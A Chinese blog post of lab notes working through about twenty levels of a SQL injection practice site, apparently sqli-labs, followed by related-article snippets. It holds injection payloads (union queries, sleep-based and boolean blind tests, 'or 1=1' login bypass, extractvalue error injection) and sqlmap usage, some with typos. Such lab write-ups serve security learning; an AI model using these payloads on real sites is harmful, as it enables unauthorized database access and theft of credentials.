sql注入靶场练习

最新推荐文章于 2024-04-01 21:31:59 发布
最新推荐文章于 2024-04-01 21:31:59 发布
阅读量5.8k 收藏 6
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46976845/article/details/123591693
版权

pass.1
在这里插入图片描述
发现id注入点,尝试联合注入
id=1’ union select 1,database().3 --+或者
id=1’ union select 1,database().3#’
返回
Welcome Dhakkan
Your Login name:Dumb
Your Password:Dumb
跑sqlmap
得知数据库账户密码都为root
pass.2
注入与1相同
pass.3
括号闭合
注意
?id=1’) union select 1,database().3 --+
pass.4
双引号字符型注入
?id=1") union select ,1database(),3 --+
但是也是对的
?id=1’) union select ,1database(),3 --+
在这里插入图片描述pass.5
在这里插入图片描述
无报错,有返回,无结果。考虑布尔型盲注、报错型注入、时间延迟型盲注
?id=1’ and sleep(10) --+
在这里插入图片描述
时间线判断,时间延迟盲注
跑sqlmap获取数据库名
在这里插入图片描述
pass.6
时间盲注依然有延迟返回,虽然没有结果
在这里插入图片描述
继续跑sqlmap
在这里插入图片描述
拿到当前数据库账户密码
pass.7
string型注入,需要))才能进行闭合
在这里插入图片描述
丢sqlmap

pass.8
布尔型单引号盲注
id=1’ and if(substr(database(),1,1)=‘s’,sleep(5),sleep(10)) --+
延迟判断s是正确的数据库开头.
另外一种方法 采用asciall码进行判断
?id=1’ and if(ascii(substr(database(),1,1))>1,sleep(5),sleep(1)) --+

pass.9
基于时间的单引号盲注
?id=1’ and if(length(database()=8),sleep(5),sleep(10)) --+
有明显延迟
手工继续探测下去取得数据长度,再去每一位字符比较,可得出当前数据库名称
丢sqlmap跑
在这里插入图片描述

pass.10
基于时间的双引号盲注
?id=1"%20and%20if(length(database())=9,sleep(1),sleep(10))%20–+
跟9一致。同样的方法

pass.11
是个登录框
admin’ or 1=1#’
123456
注入成功
url没变,判定是post提交
在这里插入图片描述
可用sqlmap三种跑post请求方案
1.bp导出包,sqlmap -r 加载文件跑包
2.-forms sqlmap自动判断表单
3.-n 指定post参数

pass.12
还是那个登录框
尝试admin’ or 1=1#‘报错
admin" or 1=1#’
admin") or 1=1#‘闭合成功
在这里插入图片描述
pass.13
经过多次尝试,发现没有回显是因为注入成功了
使用’)发现可以合并,但是报错会有回显
报错注入
admin’) and extractvalue(1,concat(0x7e,(select database()))) #’
在这里插入图片描述
pass.14
POST单引号变形双注入

pass.15
基于bool型/时间延迟单引号POST型盲注
1’ or 1=1#‘注入成功无回显
admin’ and sleep(10)#'判断时间注入成功

pass.16
基于bool型/时间延迟的双引号POST型盲注
根据题目是使用“)闭合
实际测试
admin") and sleep(10)#并没有延迟或返回结果

pass.17
基于错误的更新查询POST注入
在这里插入图片描述
修改账户密码的地方,猜测是update更新查询。
网上查阅了一下,这道题的源码是uname被覆盖,而passwd则并没有,passwd的注入。
如果 magic_quotes_gpc 为关闭时返回 0,否则返回 1。在 PHP 5.4.O 起将始终返回 FALSE。magic_quotes_gpc开启时用于在预定义字符(单引号、双引号、斜杠、NULL)前加上反斜杠,

5.4.0 始终返回 FALSE,因为这个魔术引号功能已经从 PHP 中

pass.18-20
全部为http头文件注入

打开发现了本地ip的回显
盲目猜测是http请求头的注入,使用bp抓包
进行对host,user-agent多次尝试失败
网上搜索相关题目
是对user-agent: ‘ databases();的注入
尝试依然失败

hq_hq_cnhonker
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BP靶场SQL注入练习
剁椒鱼头没剁椒的博客
01-14 1638
Bp靶场有点类似于常见的DVWA靶场、piachu靶场,里面富含多种不同类型的漏洞,并且每个靶场都有针对性,例如sql注入,从最简单的判断开始,逐步的增加难度,并且每一个靶场都附带介绍以及通过方式,能够让新人快速的了解原理并且针对性练习
SQL注入--靶场练习
wmr123456001的博客
02-11 1629
SQL注入靶场练习
SQL注入的相关例题(ctfhub)
2401_82388450的博客
04-01 647
例题。
墨者学院在线靶场--WEB安全--SQL注入
m0_59022585的博客
07-09 991
测试注入禁用password,注入-1+%75nion+%73elect+1,%64atabase(),(%73elect+group_concat(%70%61%73%73%77%6f%72%64)+%66rom+%73%74%6f%72%6d%67%72%6f%75%70%5f%6d%65%6d%62%65%72),4回显得到三个MD5加密的密码。
SQL注入靶场_辛巴猫舍
cxllwh的博客
12-22 701
注:可能有的人喜欢用GROUP_CONCAT 函数,即通过,间隔将多行数据进行整合在一行输出,虽然不用limit去一个一个的查询,但是有的站输出点是由长度限制的,所以会出现输出不完整的情况,在此建议大家习惯利用limit分页查询来输出。输入order by 1和order by 2时页面正常,到order by 3的时候页面显示异常,由此可以得到字段数为2。3.寻找回显点,构造?1.首先我们查一下该数据库有几行,将id=1分别换为2,3,4进行测试,发现到id=4时页面不再显示。漏洞类型:SQL注入
墨者学院;SQL手工注入;在线靶场SQLsever;
xiaochenhang的博客
08-21 1162
object ():数据库中每个对象都有一个唯一的id值,object_id(name)可以根据表对象名称得到表对象的ID,object_id()只能返回用户创建的对像的ID,像以sys开头的表都是系统表所以返回不了的。sa权限:数据库操作,⽂件管理,命令执⾏,注册表读取等system:SQLServer数据库的最 ⾼权限。syscolumns:记录了数据库中所有表的字段,常⽤字段为id、name和xtype。id为标识,name为对应的表名和字段名,xtype为所对应的对象类型。
sql-lap注入靶场
最新发布
05-02
sql注入练习靶场,实现注入漏洞复现,让你也当一回黑客。安装方法可以自己上网找哦。 使用方法:通过猜解,判断实现密码破解
SQL注入练习.rar
06-25
sql-labs,该环境可以用来练习sql注入。是闯关类型的一个靶场环境,从易到难,从简到繁。将每一关都闯过的话,对于sql注入的理解会比较深入。
PHP+MYSQL 注入靶场
04-26
里面有相关源码,参照源码去理解漏洞会更深刻,靶场中有SQL字符型注入SQL盲注,提供给大家进行练习使用。
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
WEB渗透学习-pikachu靶场练习
04-20
pikachu是一个开源靶场,适用于新手学习WEB安全时练习使用,内涵XSS漏洞、sql注入漏洞、SEC漏洞、文件上传(下载)漏洞、文件包含漏洞以及越权漏洞等
WEB常见漏洞之SQL注入靶场篇—1)
One-Fox安全团队的博客
05-05 3443
sqli靶场SqliLabs 是一个学习 SQL 注入靶场,它提供了 GET 和 POST 的实验场景,涵盖了联合查询注入、基于报错的注入、基于时间的盲注、基于布尔的盲注、堆叠注入、二次注入以及各种注入绕过。
SQL注入靶场通关
热门推荐
龙卷风摧毁停车场
04-08 1万+
SQL注入靶场通关 SQL注入简介 SQL注入是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 SQL注入原理 SQL注入攻击是通过操作输入来修改SQL语句,用以达到执行代码对WEB服务器进行攻击的方法。就是在post/getweb表单、输入域名或页面请求的查询字符串中插入SQL命令,使web服务器执行恶意命
SQL注入-bWAPP靶场-post
m0_62665450的博客
12-31 213
sql注入
sql注入靶场实操
weixin_45711977的博客
06-23 3353
sql注入靶场实操
宝,我今天注入了,注入的想你的液[SQL注入sqli-labs(Less1-6)]
MachineGunJoe666
06-17 512
什么是SQL注入 在开始靶场之前,先要清楚什么是SQL注入,可能大多数朋友都已经了解,但要给刚开始学习注入的朋友提一下,虽然不见得能起多大作用,但却能很好地帮助我们开始入门学习。SQL注入SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 简单来说,就是网站的后台程序过于信赖用户的输入,没有对
自己搭建sql注入靶场sqlmap脚本利用
Bu2n的博客
01-12 1373
搭建环境数据库准备工作靶场第一关靶场第二关sqlmap脚本编写运用脚本参考资料 搭建环境 Debian10.x apache2 MariaDB10.x php7.3 环境搭建可参考 https://blog.csdn.net/weixin_43623271/article/details/122372456 数据库准备工作 下面的操作可以根据自己的喜好更改,如数据库名字,表名,记录,用户名(也可以用root),总之可以随便改 创建一个test数据库 创建一个class数据表 插入几条数据 .
测试具有44个漏洞点的简单小靶场-SQL注入
虚闻界的博客
08-11 1234
关于常见SQL注入的经验及小技巧,以及自己的一些学习经历
SQL注入实验靶场(附环境)
m0_74025111的博客
11-05 267
​ 扫出了一个库,证明信息就在这个库里面,得知信息在此库里面就好办了,直接爆表和字段信息sqlmap -u http://192.168.171.131/cat.php?​ 是一个登录页面,我们不知道密码,那我们就通过数据库来进行获取信息,在前面的源码中发现存在id参数注入,测试一下该靶场是否存在sql注入。页面没有什么可用的资源,查看源码,从源码可以发现是存在id参数注入,文件上传。进入到上传目录,发现了这个页面存在图片和信息类的,还有相关的路径。通过路径还可以发现有admin目录的,直接访问一手。
PentesterLab靶场sql注入流程
07-27
PentesterLab靶场SQL注入流程可以按照以下步骤进行: 1. 首先,我们需要找到一个存在SQL注入漏洞的目标网站。可以使用工具或手动查找目标网站。 2. 一旦找到目标网站,我们可以使用不同的注入技术进行测试。在引用\[1\]和\[2\]中提供的案例中,可以尝试使用报错注入和联合查询注入。 3. 对于报错注入,我们可以尝试在URL参数中插入一些特殊字符和SQL语句,以触发错误并获取数据库信息。例如,在引用\[1\]中提供的案例中,我们可以尝试使用updatexml函数来获取数据库名称。 4. 对于联合查询注入,我们可以尝试在URL参数中插入一些特殊字符和SQL语句,以执行额外的查询并获取数据库信息。例如,在引用\[2\]中提供的案例中,我们可以尝试使用UNION SELECT语句来获取额外的数据列。 5. 如果我们成功地发现了SQL注入漏洞并获取了数据库信息,我们可以使用工具如sqlmap来自动化注入过程,以获取更多的数据库信息。 6. 最后,我们可以根据获取的数据库信息来进一步探索和利用漏洞,以达到我们的渗透测试目标。 请注意,进行SQL注入测试时,应遵循合法和道德的原则,并获得合法的授权。 #### 引用[.reference_title] - *1* *2* [PentesterLab靶场sql注入流程](https://blog.csdn.net/m0_37570494/article/details/122727777)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [一次简单的SQL注入靶场练习](https://blog.csdn.net/lza20001103/article/details/125958035)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值